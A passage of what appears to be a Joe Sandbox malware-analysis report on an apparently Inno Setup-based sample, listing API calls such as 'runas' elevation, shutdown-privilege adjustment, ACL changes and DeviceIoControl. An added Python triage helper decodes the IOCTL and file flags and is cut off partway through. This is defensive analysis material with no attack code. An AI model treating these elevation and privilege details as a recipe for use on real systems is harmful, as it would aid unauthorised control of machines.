                                                                          • CloseHandle.KERNEL32(000000FF,00456C80,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00456C73
                                                                            • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                          • Instruction ID: 1494ba0c9f092ba5553c36d9802a3eccbba6a72ce31e74165ab773d774e4cee1
                                                                          • Opcode Fuzzy Hash: 5006241aebc6898b4b8c5a0b3d2f1eafd7ba10c83dc686a4641eb2167e0a9961
                                                                          • Instruction Fuzzy Hash: 90714570A003449FDB11DB69CC41B9EBBF8EB09305F5185BAF908FB282D77859488F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 0045AEFE
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045AF1E
                                                                          • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045AF2B
                                                                          • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045AF38
                                                                          • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045AF46
                                                                            • Part of subcall function 0045ADEC: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045AE8B,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045AE65
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045AFFF
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045B139,?,?,00000000), ref: 0045B008
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                          • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                          • API String ID: 59345061-4263478283
                                                                          • Opcode ID: 2e1c75f00da70986db0bef7873a233c0400535374564b15abc59da2f2a3f743b
                                                                          • Instruction ID: e1143608cea91b2c9fc6243bba76dd5dc8e0698664409433b5fa99cab1fe32bf
• Instruction Fuzzy Hash: 275191B1900608EFDB10DF99C851BAFB7B8EB09751F14806AF915B7381C3389948CFA9
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 004734FF
• GetLastError.KERNEL32(?,?), ref: 00473508
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00473555
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00473579
• CloseHandle.KERNEL32(00000000,004735AA,00000000,00000000,000000FF,000000FF,00000000,004735A3,?,?,?), ref: 0047359D
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: CloseCodeErrorExecuteExitHandleLastMultipleObjectsProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 171997614-221126205
• Opcode ID: 468cd06050aeac50d7fc6c39a96f1f48007959102f91cd93909f9b3bed5077f9
• Instruction ID: 9270c58e3c51a63ec14468394db3a8dd1a523cee094c78596453f11dd74f1eb5
• Instruction Fuzzy Hash: F72177B0A00114BEDB11EFA99842BDE76E8EB04309F50847BF508E7382DB7C8B059B5D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422964
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422B2E), ref: 00422974
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: 922aa224a59eb388fd409ef1a4572993a041e07f03dc34a9f221e61418859b32
• Instruction ID: 2ef64a615a047e5f68810d1bba8f9c023c2191b8b92af7ee41424443907fb462
• Instruction Fuzzy Hash: F0919271B04214FFD710EBA9DA86F9D77F4AB09304F5100B6F504AB3A2C778AE419B58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00418303
• GetWindowPlacement.USER32(?,0000002C), ref: 00418320
• GetWindowRect.USER32(?), ref: 0041833C
• GetWindowLongA.USER32(?,000000F0), ref: 0041834A
• GetWindowLongA.USER32(?,000000F8), ref: 0041835F
• ScreenToClient.USER32(00000000), ref: 00418368
• ScreenToClient.USER32(00000000,?), ref: 00418373
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Window$ClientLongScreen$IconicPlacementRect
• String ID: ,
• API String ID: 2266315723-3772416878
• Opcode ID: e2831b492a02c7fbc1c424da0d3d82ddc563106dbc431b226c0011ccd89e5e33
• Instruction ID: 9cf88c6662a8b54f2d940af1896da5675c8924d24fa9a5d7825e36bf04e718ba
• Instruction Fuzzy Hash: 40112B71505201AFDB00DF69C885F9B77E8AF49314F18067EBD58DB286C739D900CB69
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000,00000000), ref: 00478395
• FindNextFileA.KERNEL32(000000FF,?,00000000,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 00478481
• FindClose.KERNEL32(000000FF,004784AC,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 0047849F
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000), ref: 004784F8
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Find$File$First$CloseNext
• String ID: dF
• API String ID: 2001080981-2048908954
• Opcode ID: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
• Instruction ID: 1e7589c0754ebee773f1854eaa6e10daa326bf9e4fcfb169a8671094cc7bf5de
• Instruction Fuzzy Hash: 55713F7090020DAFCF11EFA5CC45ADFBBB9EB49304F5084AAE408A7291DB799B45CF59
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453D7A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA1
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA6
• ExitWindowsEx.USER32(00000002,00000000), ref: 00453DB7
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
• Instruction ID: d8781a87663673bff4f7e6514a95c709f3d412548914224523031170f5c416b5
• Instruction Fuzzy Hash: 4EF0687039470675E610AE71CD07F6B21F89B40B8BF50482ABD45EA1C3D6BCD60C4A6E
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B4B5
• GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B4C5
• GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B4D5
• ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A0C3,00000000,0047A0EC), ref: 0045B4FA
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: AddressProc$CryptVersion
• String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
• API String ID: 1951258720-508647305
• Opcode ID: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
• Instruction ID: 5c97a33bf6e4b00775a7c8e6a9d5d7120da5cee44da396d260546e37c2af37dc
• Instruction Fuzzy Hash: E5F012B150170DEEE758DF76EC85A263695E7EC31EF14803B6405551BEE778044ACA1C
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8,?,?,00000000,00494628), ref: 00491F13
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00491F96
• FindNextFileA.KERNEL32(000000FF,?,00000000,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000), ref: 00491FAE
• FindClose.KERNEL32(000000FF,00491FD9,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8), ref: 00491FCC
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
• Opcode ID: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
• Instruction ID: 691f2d73da31f32e7dea4a5c2fc00664967572ef0d2ca01005a435b1a41f50a9
• Instruction Fuzzy Hash: 95318871A0160DAFDF10EF66CC41ADEBBBCDB45304F5084B7A808A32A1D7389E45CE58
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554C5
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554EC
• SetForegroundWindow.USER32(?), ref: 004554FD
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004557D7,?,00000000,00455813), ref: 004557C2
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455642
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
• Instruction ID: 0e8bbef3c373df75fc6cad67ac7c13520a564414c71ee93b02e72d74791e7f0d
• Instruction Fuzzy Hash: EA910034604A44EFD715CF64D961F6ABBF5EB8D704F2080BAE90897792C738AE05CB18
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004546A8), ref: 004545A4
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004545AA
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
• Instruction ID: ea8d5c54c38255325536962d047065f6d17d79332955beca5d267283e39a3316
• Instruction Fuzzy Hash: 27317371A04249ABCB01DFA5D882ADFB7F8EF49704F504567E800F7292D67C5D088A68
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417C7F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
• Instruction ID: c7e48a005123f112bfb3c773aae920d88014dc0855fb7fe4f04d55f6c4297c8c
                                                                          • Opcode Fuzzy Hash: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
                                                                          • Instruction Fuzzy Hash: 92213E71604204ABCF00EF69D8C4ADA77B8AF48314F11456AFD18DF346D678E984CBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00460399), ref: 0046020D
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046029C
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046032E
                                                                          • FindClose.KERNEL32(000000FF,00460355,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 00460348
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                          • Instruction ID: c22440ca7c527640d667828617bb25d04212bcbd0bedb4656b6a98293150bfae
                                                                          • Opcode Fuzzy Hash: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                          • Instruction Fuzzy Hash: 3E419930A046189FCB11EF65DC55ADEB7B8EB48705F4044FAF804EB391E67C9E888E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0046083F), ref: 004606CD
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 00460713
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607C8
                                                                          • FindClose.KERNEL32(000000FF,004607F3,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607E6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                          • Instruction ID: 403a6866901340eb541ce2889c412c5575f061829704f8cbc5206a85907b83c4
                                                                          • Opcode Fuzzy Hash: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                          • Instruction Fuzzy Hash: 68416335A006189BCB11EF65DC859DFB7B8EB88305F5044BAF804A7351E77CAE448E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E6FE
                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E736
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E73E
                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E744
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                          • Instruction ID: d5c332dd154d0a6876031c1b9749a0de84ba629fdfa8bcc8c87bd6e344ced3d8
                                                                          • Opcode Fuzzy Hash: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                          • Instruction Fuzzy Hash: AAF0F0B13917207AF620B17A6CC6F7B018CC7C5B68F10823ABB04FF1C1D9A84D05056D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%
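The five calls listed for the function at 0042E6FE are the report's whole basis for the "communicate with device drivers" signature, and the API names alone do not say whether this is a driver IOCTL or an ordinary file-system control. The helper below is an added triage example, not part of the Joe Sandbox report or of the sample. It parses the report's bullet-line format into records, then decodes the DeviceIoControl control code with the CTL_CODE bit layout from winioctl.h and the CreateFileA flags from fileapi.h/winnt.h. Applied to these five lines, 0009C040 splits into FILE_DEVICE_FILE_SYSTEM, function 16, METHOD_BUFFERED, read|write access, which is the value of FSCTL_SET_COMPRESSION, and the 2-byte input buffer (nInBufferSize = 00000002) matches the USHORT compression state that FSCTL takes; the handle comes from CreateFileA with GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS. Two assumptions are built in: the sample listing is copied from the report lines above, and values beyond a function's declared parameter count are treated as caller stack residue (the GetLastError line repeats the CreateFileA arguments, which is consistent with the listing printing the stack at the call site). The KNOWN_IOCTLS table holds only the one code checked by hand.

```python
"""Decode the constants behind Joe Sandbox 'APIs' lines.

Added triage helper, not part of the Joe Sandbox report or the sample. It parses
lines of the form '• Name.MODULE(arg,...), ref: ADDR' and decodes DeviceIoControl
and CreateFileA arguments, so a 'communicate with device drivers' hit can be judged
from the control code itself rather than from the API name alone.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the five calls the report lists for the function at 0042E6FE.
SAMPLE_LISTING = """\
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E6FE
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E736
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E73E
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E744
"""

API_LINE = re.compile(r"•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the report printed '?' (unresolved)
    ref: int                   # address of the call instruction


def parse_listing(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' section into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = [a.strip() for a in m.group(3).split(",") if a.strip()]
        args = [None if a == "?" else int(a, 16) for a in raw]
        calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return calls


# CTL_CODE(DeviceType, Function, Method, Access) layout from winioctl.h:
# bits 31..16 device type, 15..14 access, 13..2 function, 1..0 method.
DEVICE_TYPES = {0x7: "FILE_DEVICE_DISK", 0x9: "FILE_DEVICE_FILE_SYSTEM",
                0x12: "FILE_DEVICE_NETWORK", 0x22: "FILE_DEVICE_UNKNOWN"}
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
# Only codes checked by hand against winioctl.h; extend as needed.
KNOWN_IOCTLS = {0x0009C040: "FSCTL_SET_COMPRESSION"}


def decode_ioctl(code: int) -> Dict[str, object]:
    """Split an IOCTL/FSCTL code into its CTL_CODE fields."""
    dev = (code >> 16) & 0xFFFF
    return {
        "device_type": dev,
        "device_name": DEVICE_TYPES.get(dev, "unknown"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


# CreateFile flag values from winnt.h / fileapi.h.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in sorted(table.items()) if value & bit]


def decode_create_file(call: ApiCall) -> Dict[str, object]:
    """Decode CreateFileA/W parameters 2..6; values past slot 7 are caller stack residue."""
    if not call.name.startswith("CreateFile") or len(call.args) < 7:
        raise ValueError("not a CreateFile call with 7 argument slots")
    access, share, _sa, disp, flags, _tmpl = call.args[1:7]
    return {
        "access": _bits(access or 0, GENERIC),
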